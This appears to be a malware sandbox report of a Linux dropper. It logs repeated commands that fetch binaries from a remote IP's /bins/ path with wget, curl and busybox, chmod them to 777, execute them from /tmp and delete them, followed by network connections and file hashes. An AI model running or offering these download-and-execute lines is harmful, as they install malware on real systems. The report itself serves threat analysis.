[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/rm

[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/usr/bin/wget

[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/chmod

[chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD

[./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/rm

[rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/usr/bin/wget

[wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/chmod

[chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1

[./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/rm

[rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/usr/bin/wget

[wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/chmod

[chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL

[./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/rm

[rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/usr/bin/wget

[wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/chmod

[chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz

[./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/rm

[rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/usr/bin/wget

[wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/chmod

[chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0

[./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/rm

[rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/usr/bin/wget

[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/chmod

[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J

[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/rm

[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/usr/bin/wget

[wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/chmod

[chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d

[./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/rm

[rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/usr/bin/wget

[wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/chmod

[chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ

[./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/rm

[rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/chmod

[chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0

[./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/rm

[rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/usr/bin/wget

[wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/chmod

[chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ

[./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/rm

[rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/chmod

[chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g

[./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/rm

[rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97